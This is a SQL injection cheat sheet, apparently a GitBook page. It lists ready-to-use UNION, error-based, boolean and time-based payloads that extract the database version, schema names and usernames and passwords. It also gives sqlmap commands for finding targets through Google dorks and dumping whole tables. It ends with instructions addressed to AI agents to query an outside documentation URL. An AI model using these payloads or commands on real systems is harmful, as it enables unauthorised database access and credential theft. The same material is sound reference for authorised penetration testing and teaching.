# SQL Injection

## UNION-Based

```
# How To Detect
'
-- abc

# Find Number Of Columns
' ORDER BY 2-- abc
' UNION NULL,NULL-- abc

# Test Columns Data Types
' UNION SELECT 'a',NULL-- abc
' UNION SELECT NULL,'a'-- abc

# Print Database Version
' UNION SELECT @@version,@@version-- abc

# Print Multiple Values On One Column
' UNION SELECT CONCAT('username','~','password') FROM users--

# Print Databases and Tables
' UNION SELECT table_name,table_schema FROM information_schema.tables-- abc

# Print Tables and Columns
' UNION SELECT table_name,column_name FROM information_schema.columns WHERE table_name ='user'-- abc

# Print Specific Database, Table and Columns
' UNION SELECT host,user FROM mysql.user-- abc
```

## Error-Based

```
' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT @@version)))-- abc

' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1)))-- abc
```

## Boolean-Based

```
# Detect
' AND 1=1-- abc
' AND 1=2-- abc
' AND '1'='1
' AND '1'='2

# Print Database Version
' AND @@version = '8.0.28'-- abc
' AND @@version LIKE '8.0.28'-- abc

# Print Database Version
' AND SUBSTRING((SELECT @@version),1,1) > '7'-- abc
' AND SUBSTRING((SELECT @@version),2,1) = '.'-- abc

# Print Database Name
' AND SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1) = 'i'-- abc

# Print Specific Entry
' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

# Boolean Conditional Errors
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (CASE WHEN (SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i') THEN 1/0 ELSE 'a' END)='a'-- abc
```

## Time-Based

```
' AND SLEEP(5)-- abc

' AND IF(1=1,SLEEP(5),'a')-- abc

' AND IF((SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i'),SLEEP(5),'a')-- abc
```

## SQLMAP

```
sqlmap -u https://domain.com/product.php?id=1 -p id --proxy http://192.168.43.164:8080 --random-agent --delay 0.5 --threads 10 --flush-session -v 3

sqlmap -g inurl:/product.asp?id= --random-agent --batch --smart

sqlmap -r request.txt --force-ssl --random-agent --level=3 --risk=2 --technique=B --threads=10 --banner --dbs

sqlmap -r request.txt --force-ssl --random-agent -D database_name -T table_name1,table_name2,table_name3 --dump

sqlmap -r request.txt --force-ssl --random-agent -v 4 -p "id,cookie" --cookie="_ga=*" --skip "code,x,host,user-agent,referer"
```

![](/files/zgxVfkTMU4Dm2ZxV28z5)

![](/files/3739I7fWKL0f3yVYkOE0)

![](/files/8oYeN2QEsupAFhEKvB2m)

![](/files/x1IJEy1OuIuXv9jIPrlm)

Reference: <https://portswigger.net/web-security/sql-injection/cheat-sheet>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hsaad.gitbook.io/x/extras/sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.